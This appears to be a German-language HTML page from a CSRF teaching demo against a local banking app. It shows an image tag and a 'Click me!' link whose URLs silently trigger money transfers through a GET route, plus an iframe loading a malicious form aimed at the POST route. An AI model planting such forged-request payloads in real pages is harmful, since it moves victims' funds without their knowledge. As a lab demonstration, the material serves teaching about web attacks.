<div class="evil-container">
    <h2>Ausnutzen von GET-Anfragen</h2>
    <br>
    <p>Die <code>GET /transfer</code> Route ist am einfachsten abzufangen. Dabei wird dem User ein infiziertes Bild angezeigt: </p>
    <div><img src="http://localhost:3000/transfer?to=Viet&amount=4"></div>
    <br>
    <p>Genauso kann man einen Link einfügen welcher einen Transfer auslöst: </p> <br>
    <div><a href="http://localhost:3000/transfer?to=Viet&amount=7">Click me!</a></div>
    <br>
    <br>
    <h2>Ausnutzung der POST Route</h2>
    <br>
    <p>Die <code>POST /transfer</code> Route ist ein bisschen komplizierter auszunutzen und benötigt deshalb JavaScript um den Transfer durchführen zu können: </p>
    <br>
    <div>
        <iframe width="100%" height="400px" src="/malicious-form"></iframe>
    </div>
</div>